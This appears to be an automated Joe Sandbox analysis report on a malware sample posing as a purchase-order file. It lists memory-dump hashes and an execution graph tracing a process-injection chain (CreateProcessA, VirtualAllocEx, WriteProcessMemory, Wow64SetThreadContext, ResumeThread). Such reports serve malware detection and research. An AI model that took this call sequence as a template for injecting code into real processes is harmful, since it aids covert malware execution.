                          • Snapshot File: hcaresult_0_2_e3d000_PO-0Y9005373R664.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 95a5ed7b3b67ae6e0b5513c891b6d2c4ab9329fe07f7223fd874979b76947da2
                          • Instruction ID: bd0712b8933060fdc481de922d2309de155208686977094a4ba20f6644a6c92c
                          • Opcode Fuzzy Hash: 95a5ed7b3b67ae6e0b5513c891b6d2c4ab9329fe07f7223fd874979b76947da2
                          • Instruction Fuzzy Hash: 7C214971508304EFDB01DF60EDC4B26BF65FB84318F20C5ADE8095B262C336D816CA62
                          Memory Dump Source
                          • Source File: 00000000.00000002.1743908855.0000000000E3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E3D000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_e3d000_PO-0Y9005373R664.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 93b5c6cc17a8f55656bf9f8eb85a7cac6112f82c0c475b6d60e3dfcf3f2ff912
                          • Instruction ID: 6e78b1d10d5e691ed6063dbd2472bcd046f3030fcdff4553e511280067a134c5
                          • Opcode Fuzzy Hash: 93b5c6cc17a8f55656bf9f8eb85a7cac6112f82c0c475b6d60e3dfcf3f2ff912
                          • Instruction Fuzzy Hash: 8F212571508304DFDB18DF24E8C8B16BF66FB84B18F20C569E8495B286C336D807CE62
                          Memory Dump Source
                          • Source File: 00000000.00000002.1743908855.0000000000E3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E3D000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_e3d000_PO-0Y9005373R664.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: cd669800c02385241cd7fa45576a6445e65af6611c576cf3b6c864ca47207386
                          • Instruction ID: 6cea65cc12a218968fecc8a1a0dc5491c9890f659954b7ac071703659f0d5c47
                          • Opcode Fuzzy Hash: cd669800c02385241cd7fa45576a6445e65af6611c576cf3b6c864ca47207386
                          • Instruction Fuzzy Hash: E821837550D3809FC706CF24D994715BF71EB46314F29C5DAD8498F6A7C33A980ACB62
                          Memory Dump Source
                          • Source File: 00000000.00000002.1743875758.0000000000E2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E2D000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_e2d000_PO-0Y9005373R664.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 0d1964494f132f00775c0e221f472ab769a33717f3edcd57285c8181465a4d2f
                          • Instruction ID: 67456640684cb0e0b44b54fd357f960b13f303fd0338f726168313f7888d7d21
                          • Opcode Fuzzy Hash: 0d1964494f132f00775c0e221f472ab769a33717f3edcd57285c8181465a4d2f
                          • Instruction Fuzzy Hash: D3112672408240DFCB11DF00D9C0B16BF72FB94324F24C6A9DD090B656C33AE856CBA2
                          Memory Dump Source
                          • Source File: 00000000.00000002.1743908855.0000000000E3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E3D000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_e3d000_PO-0Y9005373R664.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: a6f14a2633b0976cf55fba98dc8f49a251bcab79b87bdac7509de7911a20ab2c
                          • Instruction ID: ab56e8941c3f4a2a95a437fa59e7957258e18cc297fe2781fb86b8605515049c
                          • Opcode Fuzzy Hash: a6f14a2633b0976cf55fba98dc8f49a251bcab79b87bdac7509de7911a20ab2c
                          • Instruction Fuzzy Hash: 5C118E75508240DFCB15CF50D9C4B16FF61FB84318F24C6A9D8494B666C33AD85ACB52
                          Memory Dump Source
                          • Source File: 00000000.00000002.1755091356.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_4f90000_PO-0Y9005373R664.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 7f8032c546311445fdb250af742b1ac4eb13db86e1fc3b093a5b165dcc93170a
                          • Instruction ID: 8acd2fb77a1e31c530acf1d98010d41eec9ec1fbedd774d6a67046cbed489551
                          • Opcode Fuzzy Hash: 7f8032c546311445fdb250af742b1ac4eb13db86e1fc3b093a5b165dcc93170a
                          • Instruction Fuzzy Hash: 021273F040978AAAE710CF65F94C1897BB1FBC5318F526209D2612E2F1DBBD194ACF44
                          Memory Dump Source
                          • Source File: 00000000.00000002.1755091356.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_4f90000_PO-0Y9005373R664.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 2a520244d8f6aa53269e1017f524491254ba91d3e3ee3d59a2f794774ea265b6
                          • Instruction ID: ddc4df4dafcf5fbd2441ae16ffa13414622a7963de016a32be29003b4f6ea693
                          • Opcode Fuzzy Hash: 2a520244d8f6aa53269e1017f524491254ba91d3e3ee3d59a2f794774ea265b6
                          • Instruction Fuzzy Hash: 6FA15932E002199FEF15DFA5D88099EB7F2FF84304B15856AE906AB225DB35ED16CB40
                          Memory Dump Source
                          • Source File: 00000000.00000002.1755091356.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_4f90000_PO-0Y9005373R664.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 08558c766b83a9705c4539e24aecb71d1ee2d6eb87bbd87f114e816690aee512
                          • Instruction ID: 391e43252e2f36e58359d0d11854d1a991041cc74338a91050706fa461b4d1f9
                          • Opcode Fuzzy Hash: 08558c766b83a9705c4539e24aecb71d1ee2d6eb87bbd87f114e816690aee512
                          • Instruction Fuzzy Hash: 04C1E3B081578AABE710DF75F8481897BB1FBC5324F526609D2616B2F0DBBD188ACF44
                          Memory Dump Source
                          • Source File: 00000000.00000002.1744446969.00000000010D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010D0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_10d0000_PO-0Y9005373R664.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 8784d713ee84a5e5d6713056df3315cb895b04e188895bd1f53deec3f917d150
                          • Instruction ID: 04412e27b9d11380824a4b3a6a7f8d3093f82b9607550fb82b4ab8f8368daa6d
                          • Opcode Fuzzy Hash: 8784d713ee84a5e5d6713056df3315cb895b04e188895bd1f53deec3f917d150
                          • Instruction Fuzzy Hash: AC610EB5E012099FDB09EFBAE85569E7FF2FBC8700F04C529D004A72A5EB7459068F50
                          Memory Dump Source
                          • Source File: 00000000.00000002.1744446969.00000000010D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010D0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_10d0000_PO-0Y9005373R664.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: fad449f2c8a70362ff3619e37af03f69e94c96a970b35898e0d49841bd4403bf
                          • Instruction ID: 127d824660bbf46c1a5d799636c6f7646017d2e3a6582753ab176efaf82e0ff4
                          • Opcode Fuzzy Hash: fad449f2c8a70362ff3619e37af03f69e94c96a970b35898e0d49841bd4403bf
                          • Instruction Fuzzy Hash: 88415571E05B588FEB5CCF6B8D4069EFAF3AFC9211F18C1BA855CAA265DB3005468F11
                          Memory Dump Source
                          • Source File: 00000000.00000002.1744446969.00000000010D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010D0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_10d0000_PO-0Y9005373R664.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 6756afd6110acb7f4b0ae93fa794eb2016e6d99b176b9ec8e5dbecc136aba47f
                          • Instruction ID: 3f75876afda3331c44b05dca7a3cec39b7b0ff970a517eb1c2d3c73fc09edeb0
                          • Opcode Fuzzy Hash: 6756afd6110acb7f4b0ae93fa794eb2016e6d99b176b9ec8e5dbecc136aba47f
                          • Instruction Fuzzy Hash: 83415171E05B588BEB1CCF6B8D4079EFAF3AFC9211F14C1BA855CAA265EB3005858F01
                          Memory Dump Source
                          • Source File: 00000000.00000002.1762708370.00000000075B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07550000, based on PE: true
                          • Associated: 00000000.00000002.1762161732.0000000007550000.00000004.08000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7550000_PO-0Y9005373R664.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: e4d7f30eebac8818d951187e4d217207d8c5c6ca9a4d51e3bf2e02c9b643331c
                          • Instruction ID: 63432118d40507e33785c964f5bceb3dd0c098c9141e32e1fa5fd1eecec893b2
                          • Opcode Fuzzy Hash: e4d7f30eebac8818d951187e4d217207d8c5c6ca9a4d51e3bf2e02c9b643331c
                          • Instruction Fuzzy Hash: 0D31C5B1E0465C8BEB58CF6BD8507EEBAF7BBC9300F14C4AAD409A6254DB340A458F51

                          Execution Graph

                          Execution Coverage:9.5%
                          Dynamic/Decrypted Code Coverage:100%
                          Signature Coverage:0%
                          Total number of Nodes:191
                          Total number of Limit Nodes:8
                          execution_graph 30891 700ace0 30892 700ad25 MessageBoxW 30891->30892 30894 700ad6c 30892->30894 30895 700a7f0 30896 700a834 30895->30896 30897 700a83e EnumThreadWindows 30895->30897 30896->30897 30898 700a870 30897->30898 30717 7009ad6 30720 70091a4 30717->30720 30721 70091af 30720->30721 30724 700a6fe 30721->30724 30722 7009ae3 30725 700a74f GetCurrentThreadId 30724->30725 30727 700a795 30725->30727 30727->30722 30715 700b088 PostMessageW 30716 700b0f4 30715->30716 30728 70088da 30732 700c8b0 30728->30732 30747 700c8c0 30728->30747 30729 700890f 30733 700c8c0 30732->30733 30762 700cea0 30733->30762 30767 700d000 30733->30767 30772 700d3fc 30733->30772 30777 700d1cb 30733->30777 30782 700d69b 30733->30782 30787 700cd59 30733->30787 30792 700cf49 30733->30792 30799 700cfe6 30733->30799 30804 700d2a6 30733->30804 30809 700d636 30733->30809 30813 700d7b3 30733->30813 30818 700d273 30733->30818 30734 700c8e2 30734->30729 30748 700c8da 30747->30748 30750 700d000 2 API calls 30748->30750 30751 700cea0 2 API calls 30748->30751 30752 700d273 2 API calls 30748->30752 30753 700d7b3 2 API calls 30748->30753 30754 700d636 2 API calls 30748->30754 30755 700d2a6 2 API calls 30748->30755 30756 700cfe6 2 API calls 30748->30756 30757 700cf49 4 API calls 30748->30757 30758 700cd59 2 API calls 30748->30758 30759 700d69b 2 API calls 30748->30759 30760 700d1cb 2 API calls 30748->30760 30761 700d3fc 2 API calls 30748->30761 30749 700c8e2 30749->30729 30750->30749 30751->30749 30752->30749 30753->30749 30754->30749 30755->30749 30756->30749 30757->30749 30758->30749 30759->30749 30760->30749 30761->30749 30763 700ceb0 30762->30763 30822 70081e0 30763->30822 30826 70081e8 30763->30826 30764 700ce19 30764->30734 30768 700d009 30767->30768 30770 70081e0 WriteProcessMemory 30768->30770 30771 70081e8 WriteProcessMemory 30768->30771 30769 700ce19 30769->30734 30770->30769 30771->30769 30773 700d402 30772->30773 30774 700d715 30773->30774 30830 7007b61 30773->30830 30834 7007b68 30773->30834 30774->30734 30778 700d7c5 30777->30778 30779 700d7ea 30778->30779 30838 70082d1 30778->30838 30842 70082d8 30778->30842 30783 700d635 30782->30783 30846 7007c11 30783->30846 30850 7007c18 30783->30850 30784 700d650 30788 700cd63 30787->30788 30854 7008470 30788->30854 30858 7008464 30788->30858 30795 7007c11 Wow64SetThreadContext 30792->30795 30796 7007c18 Wow64SetThreadContext 30792->30796 30793 700cf63 30794 700d715 30793->30794 30797 7007b61 ResumeThread 30793->30797 30798 7007b68 ResumeThread 30793->30798 30794->30734 30795->30793 30796->30793 30797->30793 30798->30793 30800 700cfec 30799->30800 30801 700d715 30800->30801 30802 7007b61 ResumeThread 30800->30802 30803 7007b68 ResumeThread 30800->30803 30801->30734 30802->30800 30803->30800 30805 700d2af 30804->30805 30807 70081e0 WriteProcessMemory 30805->30807 30808 70081e8 WriteProcessMemory 30805->30808 30806 700d782 30807->30806 30808->30806 30811 7007c11 Wow64SetThreadContext 30809->30811 30812 7007c18 Wow64SetThreadContext 30809->30812 30810 700d650 30811->30810 30812->30810 30814 700d7c4 30813->30814 30816 70082d1 ReadProcessMemory 30814->30816 30817 70082d8 ReadProcessMemory 30814->30817 30815 700d7ea 30816->30815 30817->30815 30862 7008120 30818->30862 30866 7008128 30818->30866 30819 700d291 30823 70081e8 WriteProcessMemory 30822->30823 30825 7008287 30823->30825 30825->30764 30827 7008230 WriteProcessMemory 30826->30827 30829 7008287 30827->30829 30829->30764 30831 7007ba8 ResumeThread 30830->30831 30833 7007bd9 30831->30833 30833->30773 30835 7007ba8 ResumeThread 30834->30835 30837 7007bd9 30835->30837 30837->30773 30839 7008323 ReadProcessMemory 30838->30839 30841 7008367 30839->30841 30841->30779 30843 7008323 ReadProcessMemory 30842->30843 30845 7008367 30843->30845 30845->30779 30847 7007c18 Wow64SetThreadContext 30846->30847 30849 7007ca5 30847->30849 30849->30784 30851 7007c5d Wow64SetThreadContext 30850->30851 30853 7007ca5 30851->30853 30853->30784 30855 70084f9 CreateProcessA 30854->30855 30857 70086bb 30855->30857 30859 7008470 CreateProcessA 30858->30859 30861 70086bb 30859->30861 30863 7008128 VirtualAllocEx 30862->30863 30865 70081a5 30863->30865 30865->30819 30867 7008168 VirtualAllocEx 30866->30867 30869 70081a5 30867->30869 30869->30819 30899 700897b 30900 7008b27 30899->30900 30901 70088d7 30899->30901 30901->30900 30904 7008e00 30901->30904 30908 7008df1 30901->30908 30905 7008e14 30904->30905 30912 7008e69 30905->30912 30909 7008e00 30908->30909 30911 7008e69 4 API calls 30909->30911 30910 7008e3e 30910->30900 30911->30910 30913 7008e8d 30912->30913 30917 7008eb0 30913->30917 30920 7008ec0 30913->30920 30914 7008e3e 30914->30900 30923 70092cf 30917->30923 30921 7008eda 30920->30921 30922 70092cf 4 API calls 30920->30922 30921->30914 30922->30921 30924 70092db 30923->30924 30925 700946d GetActiveWindow 30924->30925 30926 700949b 30924->30926 30928 7008eda 30924->30928 30925->30926 30926->30928 30933 7009a40 30926->30933 30937 7009a11 30926->30937 30927 700950b 30944 700ae18 30927->30944 30948 700ae09 30927->30948 30928->30914 30934 7009a48 30933->30934 30952 7008f44 30934->30952 30938 7009a84 30937->30938 30939 7009a1e 30937->30939 30940 7009194 OleInitialize 30938->30940 30941 7009a96 30938->30941 30942 7008f44 OleInitialize 30939->30942 30940->30941 30943 7009a53 30942->30943 30943->30927 30945 700ae20 30944->30945 30967 700a3a4 30945->30967 30949 700ae20 30948->30949 30950 700a3a4 3 API calls 30949->30950 30951 700ae2b 30950->30951 30951->30928 30953 7008f4f 30952->30953 30956 7009194 30953->30956 30955 7009a99 30955->30955 30957 700919f 30956->30957 30958 7009b69 30957->30958 30960 700927c 30957->30960 30958->30955 30961 7009287 30960->30961 30963 7009e83 30961->30963 30964 7009298 30961->30964 30963->30958 30965 7009eb8 OleInitialize 30964->30965 30966 7009f1c 30965->30966 30966->30963 30968 700a3af 30967->30968 30973 700a3b4 30968->30973 30971 7009194 OleInitialize 30972 700ae79 30971->30972 30974 700a3bf 30973->30974 30976 700ae63 30974->30976 30977 700aab0 GetActiveWindow GetFocus 30974->30977 30976->30971 30977->30976 30870 ad4b70 30871 ad4b8c 30870->30871 30872 ad4c1b 30871->30872 30874 ad5198 30871->30874 30875 ad51bd 30874->30875 30879 ad5299 30875->30879 30883 ad52a8 30875->30883 30881 ad52cf 30879->30881 30880 ad53ac 30881->30880 30887 ad4e8c 30881->30887 30885 ad52cf 30883->30885 30884 ad53ac 30884->30884 30885->30884 30886 ad4e8c CreateActCtxA 30885->30886 30886->30884 30888 ad6338 CreateActCtxA 30887->30888 30890 ad63fb 30888->30890 30890->30890

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 0 70092cf-70092d9 1 70092f1-700937a 0->1 2 70092db-70092f0 0->2 6 7009380-70093a5 1->6 7 70095b9-70095ec 1->7 2->1 12 70095f3-7009628 6->12 13 70093ab-70093d0 6->13 7->12 21 700962f-7009664 12->21 20 70093d6-70093e6 13->20 13->21 25 700966b-7009697 20->25 26 70093ec-70093f0 20->26 21->25 31 700969e-70096dc 25->31 28 70093f2-70093f8 26->28 29 70093fe-7009403 26->29 28->29 28->31 32 7009411-7009417 29->32 33 7009405-700940b 29->33 35 70096e3-7009721 31->35 37 7009427-700943a 32->37 38 7009419-7009420 32->38 33->32 33->35 71 7009728-70097ae 35->71 51 7009440 37->51 52 700943c-700943e 37->52 38->37 53 7009445-700945d 51->53 52->53 55 7009467-700946b 53->55 56 700945f-7009465 53->56 59 700946d-7009499 GetActiveWindow 55->59 60 70094ae-70094b7 55->60 56->55 58 70094ba-70094c7 56->58 69 7009505 58->69 70 70094c9-70094df 58->70 62 70094a2-70094ac 59->62 63 700949b-70094a1 59->63 60->58 62->58 63->62 101 7009505 call 7009a40 69->101 102 7009505 call 7009a11 69->102 78 70094e1-70094f7 70->78 79 70094fd-7009502 70->79 96 70097b0-70097b9 71->96 97 70097bb 71->97 73 700950b-7009559 call 7008f08 99 7009559 call 700ae18 73->99 100 7009559 call 700ae09 73->100 78->71 78->79 79->69 90 700955f-7009567 90->7 98 70097bd-70097c3 96->98 97->98 99->90 100->90 101->73 102->73
                          APIs
                          Memory Dump Source
                          • Source File: 0000000A.00000002.1823865398.0000000007000000.00000040.00000800.00020000.00000000.sdmp, Offset: 07000000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_10_2_7000000_VvtddClQv.jbxd
                          Similarity
                          • API ID: ActiveWindow
                          • String ID:
                          • API String ID: 2558294473-0
                          • Opcode ID: 1cf77599193f5741bce58e904ce44a647f658aa605afd4f96bdbf22122d9cad7
                          • Instruction ID: aa52b0b09eb7b801d56e6871fcb0ffd34c0c57a7f2ee85f65a93ebf223f15bf9
                          • Opcode Fuzzy Hash: 1cf77599193f5741bce58e904ce44a647f658aa605afd4f96bdbf22122d9cad7
                          • Instruction Fuzzy Hash: DAC1C2B1F103069FEB58AFB4C4647AE77E6AFC4310F148529E806EB381DF7498468B91

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 103 7008464-7008505 106 7008507-7008511 103->106 107 700853e-700855e 103->107 106->107 108 7008513-7008515 106->108 114 7008560-700856a 107->114 115 7008597-70085c6 107->115 109 7008517-7008521 108->109 110 7008538-700853b 108->110 112 7008523 109->112 113 7008525-7008534 109->113 110->107 112->113 113->113 116 7008536 113->116 114->115 117 700856c-700856e 114->117 121 70085c8-70085d2 115->121 122 70085ff-70086b9 CreateProcessA 115->122 116->110 119 7008570-700857a 117->119 120 7008591-7008594 117->120 123 700857c 119->123 124 700857e-700858d 119->124 120->115 121->122 125 70085d4-70085d6 121->125 135 70086c2-7008748 122->135 136 70086bb-70086c1 122->136 123->124 124->124 126 700858f 124->126 127 70085d8-70085e2 125->127 128 70085f9-70085fc 125->128 126->120 130 70085e4 127->130 131 70085e6-70085f5 127->131 128->122 130->131 131->131 132 70085f7 131->132 132->128 146 7008758-700875c 135->146 147 700874a-700874e 135->147 136->135 148 700876c-7008770 146->148 149 700875e-7008762 146->149 147->146 150 7008750 147->150 152 7008780-7008784 148->152 153 7008772-7008776 148->153 149->148 151 7008764 149->151 150->146 151->148 155 7008796-700879d 152->155 156 7008786-700878c 152->156 153->152 154 7008778 153->154 154->152 157 70087b4 155->157 158 700879f-70087ae 155->158 156->155 159 70087b5 157->159 158->157 159->159
                          APIs
                          • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 070086A6
                          Memory Dump Source
                          • Source File: 0000000A.00000002.1823865398.0000000007000000.00000040.00000800.00020000.00000000.sdmp, Offset: 07000000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_10_2_7000000_VvtddClQv.jbxd
                          Similarity
                          • API ID: CreateProcess
                          • String ID:
                          • API String ID: 963392458-0
                          • Opcode ID: 301dd41231a143e80a564930f70b905aa73bdf048f829fb5d50027cdd0afa22c
                          • Instruction ID: a143c970749f8d2bc171477f68074ed6986a3cbbf28ed1902dc4f3582b25c81b
                          • Opcode Fuzzy Hash: 301dd41231a143e80a564930f70b905aa73bdf048f829fb5d50027cdd0afa22c
                          • Instruction Fuzzy Hash: BBA16CB1D0071ADFEB50DF68C8417DEBBF2BB48320F148669E849A7280DB759985CF91

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 161 7008470-7008505 163 7008507-7008511 161->163 164 700853e-700855e 161->164 163->164 165 7008513-7008515 163->165 171 7008560-700856a 164->171 172 7008597-70085c6 164->172 166 7008517-7008521 165->166 167 7008538-700853b 165->167 169 7008523 166->169 170 7008525-7008534 166->170 167->164 169->170 170->170 173 7008536 170->173 171->172 174 700856c-700856e 171->174 178 70085c8-70085d2 172->178 179 70085ff-70086b9 CreateProcessA 172->179 173->167 176 7008570-700857a 174->176 177 7008591-7008594 174->177 180 700857c 176->180 181 700857e-700858d 176->181 177->172 178->179 182 70085d4-70085d6 178->182 192 70086c2-7008748 179->192 193 70086bb-70086c1 179->193 180->181 181->181 183 700858f 181->183 184 70085d8-70085e2 182->184 185 70085f9-70085fc 182->185 183->177 187 70085e4 184->187 188 70085e6-70085f5 184->188 185->179 187->188 188->188 189 70085f7 188->189 189->185 203 7008758-700875c 192->203 204 700874a-700874e 192->204 193->192 205 700876c-7008770 203->205 206 700875e-7008762 203->206 204->203 207 7008750 204->207 209 7008780-7008784 205->209 210 7008772-7008776 205->210 206->205 208 7008764 206->208 207->203 208->205 212 7008796-700879d 209->212 213 7008786-700878c 209->213 210->209 211 7008778 210->211 211->209 214 70087b4 212->214 215 700879f-70087ae 212->215 213->212 216 70087b5 214->216 215->214 216->216
                          APIs
                          • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 070086A6
                          Memory Dump Source
                          • Source File: 0000000A.00000002.1823865398.0000000007000000.00000040.00000800.00020000.00000000.sdmp, Offset: 07000000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_10_2_7000000_VvtddClQv.jbxd
                          Similarity
                          • API ID: CreateProcess
                          • String ID:
                          • API String ID: 963392458-0
                          • Opcode ID: 18e53bb2e421a27e25a37c7ae443d06252d79bbd253bcb5bf1e07041af3665b0
                          • Instruction ID: d15dd18dcbce0928f053b72bf9f6eb229691d2aebc68a2d22107db20a8f635e0
                          • Opcode Fuzzy Hash: 18e53bb2e421a27e25a37c7ae443d06252d79bbd253bcb5bf1e07041af3665b0
                          • Instruction Fuzzy Hash: 0F914BB1D0061ADFEB14CF68C8417DEBBF2BB48320F148669E849A7290DB749985CF91

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 218 ad4e8c-ad63f9 CreateActCtxA 221 ad63fb-ad6401 218->221 222 ad6402-ad645c 218->222 221->222 229 ad645e-ad6461 222->229 230 ad646b-ad646f 222->230 229->230 231 ad6471-ad647d 230->231 232 ad6480 230->232 231->232 234 ad6481 232->234 234->234
                          APIs
                          • CreateActCtxA.KERNEL32(?), ref: 00AD63E9
                          Memory Dump Source
                          • Source File: 0000000A.00000002.1819707680.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_10_2_ad0000_VvtddClQv.jbxd
                          Similarity
                          • API ID: Create
                          • String ID:
                          • API String ID: 2289755597-0
                          • Opcode ID: 926cd336a266bd169b3176bc1cf9dadd53ceed7e554431e9c0e54ed459d860eb
                          • Instruction ID: 8e3d7fa2428b653f33418a692fe2c2dc5d0e5ff07e6236d34f2954a528f58384
                          • Opcode Fuzzy Hash: 926cd336a266bd169b3176bc1cf9dadd53ceed7e554431e9c0e54ed459d860eb
                          • Instruction Fuzzy Hash: 3541B0B0C00719CBEB24DFA9C944B9EBBF5BF89704F20806AD449AB251DBB56945CF90

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 235 ad632c-ad63f9 CreateActCtxA 237 ad63fb-ad6401 235->237 238 ad6402-ad645c 235->238 237->238 245 ad645e-ad6461 238->245 246 ad646b-ad646f 238->246 245->246 247 ad6471-ad647d 246->247 248 ad6480 246->248 247->248 250 ad6481 248->250 250->250
                          APIs
                          • CreateActCtxA.KERNEL32(?), ref: 00AD63E9
                          Memory Dump Source
                          • Source File: 0000000A.00000002.1819707680.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_10_2_ad0000_VvtddClQv.jbxd
                          Similarity
                          • API ID: Create
                          • String ID:
                          • API String ID: 2289755597-0
                          • Opcode ID: 64a96d8c238b3bce99ba729827ce856fcbe12f1721c2b501d634780aa68081e7
                          • Instruction ID: 564214e6c3142519b64aa7282ccb970cc450ce450a034a29ee83f03cbef98498
                          • Opcode Fuzzy Hash: 64a96d8c238b3bce99ba729827ce856fcbe12f1721c2b501d634780aa68081e7
                          • Instruction Fuzzy Hash: 1641BFB0C00719CBEB24CFA9C944BCEBBF5BF89304F24846AD449AB251DB756945CF50

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 251 7009e59-7009e60 252 7009eb1-7009eb6 251->252 253 7009e62-7009e7a 251->253 254 7009eb8-7009f1a OleInitialize 252->254 258 7009e92-7009e99 253->258 259 7009e7c-7009e7e call 7009298 253->259 256 7009f23-7009f40 254->256 257 7009f1c-7009f22 254->257 257->256 260 7009ea3-7009ea7 258->260 261 7009e9b-7009ea2 258->261 264 7009e83-7009e8c 259->264 264->258 266 7009e8e 264->266 266->258
                          APIs
                          • OleInitialize.OLE32(00000000), ref: 07009F0D
                          Memory Dump Source
                          • Source File: 0000000A.00000002.1823865398.0000000007000000.00000040.00000800.00020000.00000000.sdmp, Offset: 07000000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_10_2_7000000_VvtddClQv.jbxd
                          Similarity
                          • API ID: Initialize
                          • String ID:
                          • API String ID: 2538663250-0
                          • Opcode ID: 2306724edc47d4fab4a5b562329a9e4e6f785a62a54df3f1d8a792d3bc7432ad
                          • Instruction ID: 1bbd28c64edf76d26c46f52abff5cbd38d6b8ccf67c6e964e2d4637a1522032a
                          • Opcode Fuzzy Hash: 2306724edc47d4fab4a5b562329a9e4e6f785a62a54df3f1d8a792d3bc7432ad
                          • Instruction Fuzzy Hash: 4921BAB19143898FDB60DFA9C5457DABBF4EF48328F10491AD485E7241D3B9A884CF91

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 267 70081e0-7008236 270 7008246-7008285 WriteProcessMemory 267->270 271 7008238-7008244 267->271 273 7008287-700828d 270->273 274 700828e-70082be 270->274 271->270 273->274
                          APIs
                          • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07008278
                          Memory Dump Source
                          • Source File: 0000000A.00000002.1823865398.0000000007000000.00000040.00000800.00020000.00000000.sdmp, Offset: 07000000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_10_2_7000000_VvtddClQv.jbxd
                          Similarity
                          • API ID: MemoryProcessWrite
                          • String ID:
                          • API String ID: 3559483778-0
                          • Opcode ID: 06e7ad589d0a786fbb0f68cb4cbf3458e1bc2508157cd365b2c614ac6bb59635
                          • Instruction ID: 23489ca8ccb6f4f5aed5435ed006e0d31c3ef4099d6e936b866bda1789b11652
                          • Opcode Fuzzy Hash: 06e7ad589d0a786fbb0f68cb4cbf3458e1bc2508157cd365b2c614ac6bb59635
                          • Instruction Fuzzy Hash: 092119B6900359DFDB10DFA9C8417DEBBF5FF48320F148429E919A7240C7799545CBA1

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 278 70081e8-7008236 280 7008246-7008285 WriteProcessMemory 278->280 281 7008238-7008244 278->281 283 7008287-700828d 280->283 284 700828e-70082be 280->284 281->280 283->284
                          APIs
                          • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07008278
                          Memory Dump Source
                          • Source File: 0000000A.00000002.1823865398.0000000007000000.00000040.00000800.00020000.00000000.sdmp, Offset: 07000000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_10_2_7000000_VvtddClQv.jbxd
                          Similarity
                          • API ID: MemoryProcessWrite
                          • String ID:
                          • API String ID: 3559483778-0
                          • Opcode ID: 97ae74c35f0d78c232f53dde515fbe56312061f1b7055181c59610529a49683a
                          • Instruction ID: c3e133366f5a92c412ce74d99a2f1f0766691e93e038e8cd381214bf66f3fcf4
                          • Opcode Fuzzy Hash: 97ae74c35f0d78c232f53dde515fbe56312061f1b7055181c59610529a49683a
                          • Instruction Fuzzy Hash: EC212AB1900359DFDB10CFAAC881BDEBBF5FF48310F148429E919A7240C7789540CBA1

                          Control-flow Graph

                          • Executed
                          • Not Executed
